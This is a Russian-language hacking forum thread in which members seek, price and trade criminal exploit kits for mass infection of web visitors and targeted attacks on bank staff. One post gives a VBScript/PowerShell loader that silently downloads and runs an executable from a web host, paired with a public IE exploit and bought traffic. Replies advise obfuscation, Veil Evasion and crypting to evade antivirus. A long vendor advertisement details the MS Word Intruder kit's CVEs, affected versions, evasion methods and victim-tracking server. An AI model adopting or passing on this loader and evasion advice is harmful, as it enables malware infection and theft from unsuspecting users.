PDA

Просмотр полной версии : Связки из паблика. Поделитесь ссылками


san-ok
10.12.2015, 01:58
Здраствуйте,

Поделитесь ссылками на связки експлоитов имеющихся в паблике, сам пока не могу найти, все ссылки которые нахожу - битые...(((

хелп плз

grimnir
10.12.2015, 19:30
http://exploitpack.com/

ubepkr
12.12.2015, 09:34
grimnir said:
↑ (https://antichat.live/posts/3925803/)
http://exploitpack.com/


Занятная игрушка.....вот только 500 евриков жалко на полную версию))

grimnir
12.12.2015, 16:36
ubepkr said:
↑ (https://antichat.live/posts/3926328/)
Занятная игрушка.....вот только 500 евриков жалко на полную версию))


кстати, до вашего поста даже не знал ,что у них есть платные версии

Надо поискать у китайцев,может кто слил уже хотя бы старую,но про версию

Хотя тот же метасплойт погибче будет

eltex
12.12.2015, 17:05
san-ok said:
↑ (https://antichat.live/posts/3925552/)
сам пока не могу найти, все ссылки которые нахожу - битые...(((


100% ты даже не искал, а пошел лёгким путём... "знатоки подскажут"

результата никогда не добьёшься

ZodiaX
12.12.2015, 17:45
Про версия по моему 300 €, 500 это уже прем с тех поддержкой)

А так старые сборки того же Nuclear'a светились в сети.

san-ok
12.12.2015, 19:23
eltex said:
↑ (https://antichat.live/posts/3926419/)
100% ты даже не искал, а пошел лёгким путём... "знатоки подскажут"
результата никогда не добьёшься


Искал целую неделю, даже маленькую связку сам сделал на базе metasploit, но ожидаемого пробива нету. Жаль что знатоки жадничают...почти никто не хочет дать даже ссылку, я уже молчу о том чтобы залить что-то в паблик.

ZodiaX
12.12.2015, 22:26
От паблик связки эффект будет тот же, приватные варианты стоят не плохих денег.

Да и связки это только инструмент, запилите в metasploit пару 0day к яве, флешу или браузеру и будет вам пробив.

san-ok
12.12.2015, 23:01
ZodiaX said:
↑ (https://antichat.live/posts/3926525/)
От паблик связки эффект будет тот же, приватные варианты стоят не плохих денег.
Да и связки это только инструмент, запилите в metasploit пару 0day к яве, флешу или браузеру и будет вам пробив.


Спасибо за ответ. У меня еще 2 вопроса. Извини если покажуться глупыми т. к. я новичок можна сказать.

1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?

2. Некотрые експлоиты имеют в себе редиректы либо и-фреймы, которые ссылаються на некий относительный URL. Следовательно такие експлоиты нельзя сохранить просто так в html. Как ними пользоваться тогда? Использовать при запущенном метасплоите?

private_static
12.12.2015, 23:17
san-ok said:
↑ (https://antichat.live/posts/3926548/)
Некотрые експлоиты имеют в себе редиректы либо и-фреймы, которые ссылаються на некий относительный URL. Следовательно такие експлоиты нельзя сохранить просто так в html. Как ними пользоваться тогда? Использовать при запущенном метасплоите?


да


san-ok said:
↑ (https://antichat.live/posts/3926548/)
1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?


нет,0day вы просто так не скачаете, на то они и 0day, либо самому искать но на это нужен огромный скил и по сути этим занимаются единицы(по сравнению с оравой труъ хакиров чьи познания ограничиваются использованием хавиджа и акунетикса и возможно скулмапа на начальном уровне), либо покупать 0day за большие деньги

san-ok
12.12.2015, 23:51
понятно. спасибо большое за хороший ответ

san-ok
13.12.2015, 01:20
Еще вопрос. Есть ли способ создать какой-то батник для Metasploit консоли, чтобы команды вручную не набирать, а сохранить большую цепочку?

eltex
13.12.2015, 10:53
san-ok said:
↑ (https://antichat.live/posts/3926454/)
Искал целую неделю, даже маленькую связку сам сделал на базе metasploit, но ожидаемого пробива нету. Жаль что знатоки жадничают...почти никто не хочет дать даже ссылку, я уже молчу о том чтобы залить что-то в паблик.


В паблике не найдёшь нормального софта...

Нанимай кодера, составляй ТЗ и будет тебе счастье)

grimnir
13.12.2015, 11:42
san-ok said:
↑ (https://antichat.live/posts/3926606/)
Еще вопрос. Есть ли способ создать какой-то батник для Metasploit консоли, чтобы команды вручную не набирать, а сохранить большую цепочку?


metasploit resource file .rc

https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/

grimnir
13.12.2015, 11:45
san-ok said:
↑ (https://antichat.live/posts/3926548/)
Спасибо за ответ. У меня еще 2 вопроса. Извини если покажуться глупыми т. к. я новичок можна сказать.
1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?


Если не 0-day то хотя бы можно использовать 1day ,на основе сверки патчей ,бинарников и т.д

http://securityaffairs.co/wordpress...iffing-patch-management-the-side-threats.html (http://securityaffairs.co/wordpress/3913/cyber-crime/1-day-exploitsbinary-diffing-patch-management-the-side-threats.html)

https://exploitshop.wordpress.com/

https://xakep.ru/2011/11/16/57581/
(https://exploitshop.wordpress.com/)

gentype
14.12.2015, 22:13
ZodiaX said:
↑ (https://antichat.live/posts/3926429/)
Про версия по моему 300 €, 500 это уже прем с тех поддержкой)
А так старые сборки того же Nuclear'a светились в сети.


оооо поделись старой версией нуклера?

san-ok
14.12.2015, 22:15
gentype said:
↑ (https://antichat.live/posts/3927408/)
оооо поделись старой версией нуклера?


И я бы хотел чтоб кто-то поделился...но я думаю не дождемся

gentype
14.12.2015, 22:21
у меня есть все другие связки, но хотел бы нуклер посмотреть

san-ok
14.12.2015, 22:23
gentype said:
↑ (https://antichat.live/posts/3927414/)
у меня есть все другие связки, но хотел бы нуклер посмотреть


ты их покупал или в паблике где-то взял?

gentype
14.12.2015, 22:25
все из паблика, коллекционирую разный софт кони, лодыри, стиллеры, связки etc

rct
15.12.2015, 00:01
grimnir said:
↑ (https://antichat.live/posts/3925803/)
http://exploitpack.com/


А это не база с exploit-db?

san-ok
15.12.2015, 00:07
rct said:
↑ (https://antichat.live/posts/3927458/)
А это не база с exploit-db?


это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас

rct
15.12.2015, 00:35
san-ok said:
↑ (https://antichat.live/posts/3927459/)
это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас


Просто показалось что оно на https://github.com/offensive-security/exploit-database-bin-sploits построено.

san-ok
15.12.2015, 01:10
Еще вопрос, подскажите кто спец.

Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/

К нему я прикрепил вот такой загрузчик:

set shell=createobject("Shell.Application")

shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1

При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.

Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..

Подскажите плз...или с трафом тем что-то не так...тогда где его брать..

rct
15.12.2015, 01:28
Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.

san-ok
15.12.2015, 01:53
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?

Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?

private_static
15.12.2015, 02:03
san-ok said:
↑ (https://antichat.live/posts/3927525/)
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?


да так не делаются дела,обычно под это дело приватный софт пишут

gentype
15.12.2015, 10:23
san-ok said:
↑ (https://antichat.live/posts/3927501/)
Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит:
https://www.exploit-db.com/exploits/35229/
К нему я прикрепил вот такой загрузчик:
set shell=createobject("Shell.Application")
shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('
http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process
'mysoft.exe'", "", "open", 1
При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.
Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
Подскажите плз...или с трафом тем что-то не так...тогда где его брать..


Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!

grimnir
15.12.2015, 13:33
rct said:
↑ (https://antichat.live/posts/3927458/)
А это не база с exploit-db?


не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)

Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php

Через гугл переводчик

rct
15.12.2015, 13:49
grimnir said:
↑ (https://antichat.live/posts/3927675/)
не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт
http://www.metasploit.cn/forum.php
Через гугл переводчик


Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01

grimnir
15.12.2015, 20:24
rct said:
↑ (https://antichat.live/posts/3927682/)
Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01


http://exploitpack.com/dreadnought.zip

должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит

rct
15.12.2015, 21:57
grimnir said:
↑ (https://antichat.live/posts/3927864/)
http://exploitpack.com/dreadnought.zip
должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит


Автоматом не обновляется, а просто открывает браузер. Суть в другом, я там полазил внутри, обрати внимание на "эксплоит" ExploitPack/exploits/code/Windows-8.1-ahcache.sys.py

Я ржал))

UNIXTREID
20.12.2015, 15:09
Посмотрел ссылки... Противоречивое впечатление Exploitpack, действительно неоригинальный какой-то, а стоит очень даже весомо )) exploitshop.wordpress устаревший (висит последняя заметка о MS12-020 Remote Code Execution Так я вот под него эксплоит до сих пор ищу, нигде нету)

По поводу эксплоит-китов: Nuclear, конечно, рулит. Но его как найти, в даркнете, наверное, только...В паблике находил только исходники RIG и Blackhole их последних версий (последних уже навечно ). Круто было бы глянуть на хоть какие-нибудь паблик выкладки Nuclear'а, пусть и старые.

P.S. Кстати, вы слышали что-нибудь про эксплоит-пак Microsoft Word Intruder ??? Недавно узнал про такой. Действует через скомпилированные вордовские доки (Ну действительно, актуально, удобно). Типа высокий пробив, в паблике экземпляров, якобы, нет...

san-ok
20.12.2015, 17:09
скиньте сайт официальный, где Nuclear купить можно. в выдаче посиковой не нахожу

seeattack
20.12.2015, 17:43
официального сайта нету)

+ связку не каждому продадут + она не продается, а сдается в аренду.

san-ok
20.12.2015, 20:07
должно же тогда существовать место куда обращаться за услугами аренды

seeattack
20.12.2015, 20:22
Jabber

и на подносе тебе его не принесут)

gentype
20.12.2015, 22:11
san-ok said:
↑ (https://antichat.live/posts/3929785/)
должно же тогда существовать место куда обращаться за услугами аренды


А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино

san-ok
20.12.2015, 22:32
gentype said:
↑ (https://antichat.live/posts/3929835/)
А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино


я буду иметь тебя в виду, если что обращусь

seeattack
20.12.2015, 22:51
gentype said:
↑ (https://antichat.live/posts/3929835/)
А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино


по поводу Nuclear насколько мне известно только аренда...

около 700$ в неделю..

зависит от количества трафика которое пройдет через нее.

san-ok
20.12.2015, 22:55
чисто любопытство: какой пробив у нуклера? на какие основные уязвимости там делаеться упор? поддерживаються все браузеры?

gentype
21.12.2015, 02:57
seeattack said:
↑ (https://antichat.live/posts/3929851/)
по поводу Nuclear насколько мне известно только аренда...
около 700$ в неделю..
зависит от количества трафика которое пройдет через нее.


Самая дорогая которую я видел была за 2250 зелени в месяц. это вроди феникс кит был...

gentype
21.12.2015, 03:09
san-ok said:
↑ (https://antichat.live/posts/3929853/)
чисто любопытство: какой пробив у нуклера? на какие основные уязвимости там делаеться упор? поддерживаються все браузеры?


Связки одинаковы разница лишь в функциональности админ панели и в свежести сплоитов, многие авторы неохотного говорят или вообще не говорят какие сплоиты у них в наборе. В основном это клиент-сайд эксплойты под Java, Adobe Flash Player, Adobe Reader, Silverlight, Word, Exel, Internet Eplorer, Mozilla Firefox, Safari, Google Chrome, Opera. Что касается типов удаленное выполнение кода там.

ol1ver
21.12.2015, 05:45
Поделитесь контактами селлера Microsoft word intruder. Лаве есть.

Если есть единомышленники - пишите в ЛС.

Спасибо!

UNIXTREID
21.12.2015, 17:32
ol1ver said:
↑ (https://antichat.live/posts/3929978/)
Поделитесь контактами селлера Microsoft word intruder. Лаве есть.
Если есть единомышленники - пишите в ЛС.
Спасибо!


Тоже интересует MS Word Intruder? И я бы его попробовал. Только вот такой вопрос: он же так же, как и большинство паков, арендуемый на площадке или же скачиваешь серверную часть прямо себе на комп, аля ратники&RMS ???

ol1ver
21.12.2015, 18:33
UNIXTREID said:
↑ (https://antichat.live/posts/3930137/)
Тоже интересует MS Word Intruder? И я бы его попробовал. Только вот такой вопрос: он же так же, как и большинство паков, арендуемый на площадке или же скачиваешь серверную часть прямо себе на комп, аля ратники&RMS ???


без понятия

UNIXTREID
21.12.2015, 18:44
Я бы если и начал, то с этого пака. Просто есть возможность рассылать целевые сообщения с вложением. Сама возможность использовать вордовские документы очень привлекает. Другие паки (те же Angler, Nuclear), в основном, я так понял нацелены на размещение на веб-странице. Но всё-таки хотелось, чтобы Intruder был не из арендуемых. Со скачиваемым сервером, чтобы потом можно было бы старую версию использовать, если что.

Ты маякни в ЛС, если какие-либо хорошие ресурсы найдёшь... Я просто немного знаю, люди вот дарккод и коровку здесь советовали, может, там...

ol1ver
21.12.2015, 19:03
UNIXTREID said:
↑ (https://antichat.live/posts/3930171/)
Я бы если и начал, то с этого пака. Просто есть возможность рассылать целевые сообщения с вложением. Сама возможность использовать вордовские документы очень привлекает. Другие паки (те же Angler, Nuclear), в основном, я так понял нацелены на размещение на веб-странице. Но всё-таки хотелось, чтобы Intruder был не из арендуемых. Со скачиваемым сервером, чтобы потом можно было бы старую версию использовать, если что.
Ты маякни в ЛС, если какие-либо хорошие ресурсы найдёшь... Я просто немного знаю, люди вот дарккод и коровку здесь советовали, может, там...


на експлойт.ин регу получаю.

скинь в лс жабу

gentype
21.12.2015, 21:19
на эксплоите есть вордовская связка, нуклер, англер, это конечно всё хорошо, не забывайте про нейтрино вполне хорошая связка.

gentype
21.12.2015, 21:26
MICROSOFT WORD INTRUDER (MWI)

MWI - профессиональное "средство доставки", эксплойт-пак на базе целого ряда самых актуальных 1-day уязвимостей в продуктах Microsoft Office Word.

Документ, сгенерированный MWI может содержать в себе до 4ех эксплойтов сразу:

1. CVE-2010-3333

2. CVE-2012-0158

3. CVE-2013-3906

4. CVE-2014-1761

Запускаемый .exe файл может содержаться как в теле самого документа, так и вытягиваться по ссылке с web-сервера.

Что отличает данный эксплойт, от всех остальных решений:

- Уникальность

MWI - это единственное решение на рынке .doc эксплойтов, которое представляет собой мультиэксплойт и атакует сразу несколько уязвимостей одновременно. Такой подход повышает шансы на успех и позволяет атаковать сразу два вектора обновлений: операционную систему и сам офисный пакет приложений.

- Универсальность

MWI охватывает почти всю линейку версий Microsoft Office: Word XP, Word 2003, Word 2007, Word 2010. Каждый эксплойт реализован так, чтобы суметь атаковать как можно больше уязвимых версий и операционных систем. По охвату уязвимых систем MWI выгодно отличается от всех альтернативных решений.

- Надежность

Эксплойт максимально независим от разного рода условий для успешной атаки: будь то версия установленного ПО в системе или те или иные защитные механизмы ОС. Каждый этап работы эксплойта продуман до мелочей.

- Обход средств защиты

Эксплойт максимально усложняет свое обнаружение: каждый элемент эксплойта защищен от обнаружения целым комплексом средств: от банальной обфускации до полиморфизма и шифрования. Каждый сгенерированный эксплойт имеет свою уникальную сигнатуру, максимально рандомизированную структуру и данные. Помимо противодействию сигнатурным методам, эксплойт использует различные методы для обхода проактивных (поведенческих) средств обнаружения. В частности, запуск .exe-файла производится из контекста доверенного системного процесса.

- Поддержка и постоянное развитие

MWI для широкой аудитории был представлен на рынке лишь весной 2013 года, хотя его первые версии были созданы еще в конце 2010 года и использовались в довольно узком кругу людей. Проект постепенно совершенствовался и улучшался, обрастая новыми эксплойтами и модулями, вконце концов сформировавшись до целого эксплойт-пака с гибкой модульной архитектурой. Проект постоянно развивается и не стоит на месте. Мы регулярно выпускаем обновления, производим чистки, дополняем эксплойт-пак новыми эксплойтами и модулями. Мы настроены на долгосрочное сотрудничество.

- Инновации

MWI - инновационное решение. Очередным подтверждением этого стало появление web-сервера статистики "mwistat", который позволяет вести полную статистику работы эксплойта, логировать когда и во сколько был открыт документ или произведена загрузка .exe-файла, с какого IP-адреса, а также некоторую другую информацию об используемом ПО на атакуемых системах (User-Agent).

http://s4.postimg.org/5ld8djbyl/mwistat_files.png

http://s3.postimg.org/ybmevy743/mwistat_logs.png

http://s22.postimg.org/gt95gtpqp/mwistat_stats.png

CVE-2010-3333: RTF pFragments Stack Buffer Overwrite Remote Code Execution Exploit [MS10-087]

EXPLOITABLE WORD VERSIONS:

Word 2003 32-bit XP, Vista, Win7, Win8 32 & 64 bit

Word 2007 32-bit XP, Vista, Win7, Win8 32 & 64 bit

Word 2010 32-bit XP, Vista, Win7, Win8 32 & 64 bit

VULNERABLE MODULE PATHS:

Word 2003 C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll

Word 2007 C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll

Word 2010 C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll

PATCHES:

Word 2003 mso.dll 11.0.8329.0000

Word 2007 mso.dll 12.0.6545.5004

Word 2010 mso.dll 14.0.5128.5000

Отличие от всех альтернативных решений:

- полная универсальность и надежность, единственное универсальное и реально рабочее решение

Цитата

CVE-2012-0158: MSCOMCTL.OCX ListView Stack Buffer Overwrite Remote Code Execution Exploit [MS12-027]

EXPLOITABLE WORD VERSIONS:

Word 2003 32-bit XP, Vista, Win7, Win8 32 & 64 bit

Word 2007 32-bit XP, Vista, Win7, Win8 32 & 64 bit

Word 2010 32-bit XP, Vista, Win7, Win8 32 & 64 bit

VULNERABLE MODULE PATHS:

C:\WINDOWS\system32\MSCOMCTL.OCX

C:\Windows\SysWOW64\MSCOMCTL.OCX

EXPLOITABLE VERSIONS:

MSCOMCTL.OCX 6.01.9545

MSCOMCTL.OCX 6.01.9782

MSCOMCTL.OCX 6.01.9786

MSCOMCTL.OCX 6.01.9813

MSCOMCTL.OCX 6.01.9816

MSCOMCTL.OCX 6.01.9818

PATCHES:

MSCOMCTL.OCX 6.01.9833

MSCOMCTL.OCX 6.01.9834

* уязвимость отсутствует в некоторых сборках MSOffice, не поддерживающих работу с ActiveX, например

Office 2010 Starter, а также различных пиратских сборках, где модуль MSCOMCTL.OCX просто отсутствует.

Отличие от всех альтернативных решений:

- полная универсальность и надежность, единственное универсальное и реально рабочее решение

Цитата

CVE-2013-3906: TIFF Heap Overflow via Integer Overflow [MS13-096]

EXPLOITABLE WORD VERSIONS:

Word 2007 32-bit XP, Vista, Win7 32 & 64 bit

Word 2010 32-bit XP 32 bit

* эксплойт основан на технологии heap-spray

1. EXPLOITATION OF OGL.DLL (Office 2007)

VULNERABLE MODULE PATHS:

C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL

EXPLOITABLE:

OGL.DLL 12.0.6509.5000

OGL.DLL 12.0.6420.1000

OGL.DLL 12.0.6420.1000

OGL.DLL 12.0.6415.1000

and others

PATCHES:

OGL.DLL 12.0.6700.5000

OGL.DLL 12.0.6688.5000

OGL.DLL 12.0.6679.5000

OGL.DLL 12.0.6659.5000

OGL.DLL 12.0.6604.1000

2. EXPLOITABLE VERSIONS OF OGL.DLL (Office 2010 + XP)

VULNERABLE MODULE PATHS:

C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL

EXPLOITABLE:

OGL.DLL 4.0.7577.4098

OGL.DLL 4.0.7577.4392

and others

PATCHES:

OGL.DLL 4.0.7577.4415

Отличие от всех альтернативных решений:

- макисмальная скорость heap-spray

- универсальность (атака сразу на office2007 + office2010)

- универсальный ROP сразу для двух версий MSCOMCTL.OCX 983x

- широкие возможности для дальнейших чисток и обфускации эксплойта

- минимальная детектируемость эксплойта (единственный эксплойт в формате RTF)

Цитата

CVE-2014-1761: RTF ListOverrideCount Memory Corruption / Object Confusion [MS14-017]

EXPLOITABLE WORD VERSIONS:

Word 2010 32-bit Win7, Win8

VULNERABLE MODULE PATHS:

C:\Program Files\Microsoft Office\Office14\wwlib.dll

EXPLOITABLE:

wwlib.dll 14.0.4762.1000

and others

PATCHES:

wwlib.dll 14.0.7121.5004

Отличие от всех альтернативных решений:

- поддержка windows 8

- недетектируемость эксплойта

Цитата

MWISTAT 2.0: statistic web-server

Web-сервер статистики mwistat позволяет вести полную статистику работы эксплойта, логировать когда и во сколько был открыт документ или произведена загрузка .exe-файла, с какого IP-адреса, а также некоторую другую информацию, как например User-Agent.

Меню:

FILES - загружаемые .exe-файлы

LOGS - логи

STATS - статистика

TOOLS - доп. инструменты (IP-whois)

Раздел FILES представляет из себя таблицу со следующими колонками:

FILE_ID - идентификатор файла (8 цифр)

FILE_NAME - имя .exe файла

FILE_DATE - дата загрузки файла

FILE_STAT_URL - так называемая "stat" ссылка для работы с этим файлом (указывается в билдере)

FILE_LOGS - кнопки для просмотра логов/статистики по данному файлу (LOGS | STATS)

ACTION - кнопки для загрузки, редактирования (reupload), удаления файла (GET | EDIT | DEL)

Кнопка ADD NEW FILE позволяет загрузить .exe-файл на сервер.

Раздел LOGS представляет из себя таблицу со следующими колонками:

DATE_TIME - дата и время запроса (при нажатии сортируются по времени в обратном порядке)

FILE_ID - идентификатор файла (8 цифр)

IP_ADDRESS - IP-адрес

IP_INFO - страна, флажок (при нажатии выводит всю IP-whois информацию)

ACTION - бывает трех видов:

1. OPEN - открытие документа.

2. LOAD - загрузка .exe файла. если с пометкой failed - .exe-файл был удален с сервера и загружен не был.

3. SUSP или SUSPICIOUS - подозрительный запрос. это могут быть попытки взлома или другие действия со стороны хакеров, антивирусных компаний, исследователей и прочих нежелательных лиц.

USER_AGENT - поле HTTP-пакета User-Agent

GET_DATA - переданные GET параметры id и act HTTP-запроса

Кнопка CLEAN STATS позволяет очистить все логи и статистику.

Раздел STATS - несколько таблиц.

Статистика по запросам:

TOTAL REQUESTS - всего запросов поступило на сервер

OPENED - из этих запросов открыто

LOADED - загружено

SUSPICIOUS - подозрительные запросы

Статистика по уникальным IP-адресам:

TOTAL IPs - всего уникальных IP-адресов

OPENED - открыто

LOADED - загружено

SUSPICIOUS - подозрительные запросы

TOTAL % - процент пробива

Статистика по уникальным IP-адресам (расширенная, список атакованных IP)

IP-ADDRESS - IP-адрес (при нажатии - просмотр всех запросов с этого IP)

IP-INFO - страна, флажок (при нажатии выводит всю IP-whois информацию)

OPENED - из этих запросов открыто

LOADED - загружено

SUSPICIOUS - подозрительные запросы

Кнопка CLEAN STATS также позволяет очистить все логи и статистику.

Раздел TOOLS содержит IP-whois сервис - вводим IP, жмем whois и получаем требуемую информацию.

Ориентировочная цена за билдер: ~4000$

имеются более бюджетные варианты (урезанные сборки) от ~3000$

seeattack
21.12.2015, 22:33
жесть)

палево развели в теме

https://soundcloud.com/ronskispeed/...om-fall-greater-tomorrow-ronski-speed-scrumup (https://soundcloud.com/ronskispeed/omnia-vs-tydi-ft-jennifer-rene-tenishia-tom-fall-greater-tomorrow-ronski-speed-scrumup)

trolex
22.12.2015, 19:42
gentype said:
↑ (https://antichat.live/posts/3930285/)
MICROSOFT WORD INTRUDER


в последнем сообщение автора в той теме написано что продажа копий приостановлена, так же запрещёно массовое использование, только для целевых атак

seeattack
22.12.2015, 20:37
по грамотному оно только для целевых атак и нужно))

для ботнетов есть связки

trolex
22.12.2015, 22:27
seeattack said:
↑ (https://antichat.live/posts/3930739/)
по грамотному оно только для целевых атак и нужно))


массовый спам по емайлам прикреплённым вордовским документом в теории должен быть очень выгоден, но автор пишет что у таких отбирает лицензию, потому что антивирусами резко начинает палится документ, а возможности по его криптовки меньше чем у ехе

seeattack
22.12.2015, 22:47
цель такого спама?

поиметь как можно больше ботов?

инструмент загнется - обломаются все.

в теории любой поток выгоден больше чем по мелочи.

ol1ver
23.12.2015, 07:09
seeattack said:
↑ (https://antichat.live/posts/3930803/)
цель такого спама?
поиметь как можно больше ботов?
инструмент загнется - обломаются все.
в теории любой поток выгоден больше чем по мелочи.


Цель такой атаки офисные работники банков, далее как чума

seeattack
23.12.2015, 08:00
если знать кому отсылаешь тогда да цель есть

UNIXTREID
04.01.2016, 19:38
seeattack said:
↑ (https://antichat.live/posts/3930917/)
если знать кому отсылаешь тогда да цель есть


Конечно, атаки через документ максимально таргетированы. Здесь индивидуальный подход к цели. Весь метод сильно завязан на соц. инженерии. =)

В продолжение темы: на одном сайте обратил внимание на баннер: там короче как раз та тема: EXE to DOC, 13 килобайт на выходе, внутри связка офисных эксплоитов под разные дыры. Короче, видно и есть MS Word Intruder или его последователи. Ссылка через редирект выкинула на ресурс mwexploit.com; Пробовал зайти: сайт что-то не работает. Так самое интересное, по рекламе цена: всего-то 10$ (!!!) за 1 doc-экземпляр.

depo
06.01.2016, 00:23
san-ok said:
↑ (https://antichat.live/posts/3927411/)
И я бы хотел чтоб кто-то поделился...но я думаю не дождемся


а вдруг дождемся добрых людей))

rct
06.01.2016, 09:45
ekperix said:
↑ (https://antichat.live/posts/3936549/)
вот, посмотри
http://vrn-auto.ru/?page=skachat_svyazku_sploytov


http://i.imgur.com/Y4XAfrG.png

Спамер, уходи.

gentype
08.01.2016, 00:19
Всем кому нужны паблик связки пишите в лс... помогу с настройкой , объясню принцип работы.